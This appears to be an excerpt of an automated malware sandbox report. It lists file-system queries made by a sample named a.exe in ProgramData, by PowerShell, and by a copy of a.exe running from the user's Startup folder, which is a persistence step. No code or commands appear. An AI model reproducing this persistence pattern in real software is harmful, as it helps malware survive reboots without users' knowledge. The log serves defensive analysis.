Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation

Source: C:\ProgramData\a.exe

